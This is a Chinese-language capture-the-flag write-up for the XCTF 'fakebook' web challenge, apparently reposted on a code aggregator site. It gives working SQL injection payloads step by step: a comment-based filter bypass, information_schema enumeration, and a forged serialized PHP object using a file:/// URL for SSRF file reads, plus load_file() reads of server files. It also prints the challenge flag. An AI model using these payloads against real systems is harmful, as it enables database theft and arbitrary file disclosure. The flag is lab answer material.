码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • 攻防世界-fakebook


    打开题目链接

    尝试弱口令登录

    失败

     随便注册

    点击admin后跳转到下面这个页面

    显示的是注册用户信息,观察url发现no=1,猜测存在注入

    用单引号测试一下,报错,确实存在SQL注入

    使用order by 判断字段数

    ?no=1 order by 5

    5的时候报错,说明有4列

    尝试联合查询注入,发现存在过滤

    ?no=0 union select 1,2,3,4 --+

    尝试使用大小写绕过,发现不行

    这里要使用内联注释/**/绕过

    ?no=0 union/**/select 1,2,3,4 --+

    可以看到回显位在2

    查数据库名:

    ?no=0 union/**/select 1,database(),3,4 --+

    数据库名为fakebook

    查该数据库下所有的表名:

    ?no=0 union/**/select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='fakebook'--+

    可以看到存在一个叫uses的表

    查该表下的列名信息:

    ?no=0 union/**/select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='users'--+

    我们一般还会对条件进行限制,指定查哪个数据库下的

    ?no=0 union/**/select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='users' and table_schema='fakebook'--+

    可以看到结果就少了几个

    查具体字段信息:

    ?no=0 union/**/select 1,data,3,4 from fakebook.users --+

    是一串序列化后的信息 :

    O:8:"UserInfo":3:{s:4:"name";s:5:"admin";s:3:"age";i:10;s:4:"blog";s:8:"zxc.blog";}

    name、age、blog为data反序列化值,blog读取成功会返回url值

    我们可以通过反序列化来实现ssrf读取任意文件

    通过目录扫描

    知道flag就在html目录下

    即:/var/www/html/flag.php 

    ?no=0 union/**/select 1,2,3,'O:8:"UserInfo":3:{s:4:"name";s:5:"admin";s:3:"age";i:10;s:4:"blog";s:29:"file:///var/www/html/flag.php";}'

    查看源码发现base64编码

    解码得到flag

    flag{c1e552fdf77049fabf65168f22f7aeab}

    这里有一个更简单的方法,由于知道了flag的路径,直接使用load_file()函数进行文件读取:

    ?no=0 union/**/select 1,load_file('/var/www/html/flag.php'),3,4 --+

    查看源码,找到flag

  • 相关阅读:
    数据库基础和DDL
    羧甲基荧光素6-FAM修饰聚缩醛Polyacetal/HA透明质酸纳米载体6-FAM-Polyacetal|6-FAM-HA(齐岳)
    浏览器渲染机制
    【最新版全插件】多功能同城优选小程序源码
    MFC的YUV播放器实现
    v-model的基本使用,v-model原理;v-model绑定;v-model的值绑定;v-model修饰符
    STM32在FreeRTOS下的us延时
    【分层强化学习】HIRO:Data-Efficient Hierarchical Reinforcement Learning
    TI C6000 TMS320C6678+Kintex-7异构多核的FPGA核心板————DSP算法案例开发手册
    阿里云基础知识小结
  • 原文地址:https://blog.csdn.net/Myon5/article/details/133546331
  • 最新文章
  • 【JVM】编译执行与解释执行的区别是什么?JVM 使用哪种方式?
    用 Hashids 优雅解决 C 端自增 ID 暴露问题
    V8引擎 精品漫游指南--Ignition篇(上) 指令 栈帧 槽位 调用约定 内存布局 基础内容
    LLVM Pass快速入门(四):代码插桩
    milkup:桌面端 markdown AI续写和即时渲染
    基于项目工程构建SBOM(软件物料清单)的研究
    鸿蒙应用开发UI基础第二节:鸿蒙应用程序框架核心解析与实操
    .NET 中如何快速实现 List 集合去重?
    扣子Coze实战:从0到1打造抖音+小红书热点监控智能体
    浅谈数据访问层
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
小工具 小游戏
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1

京公网安备 11010502049817号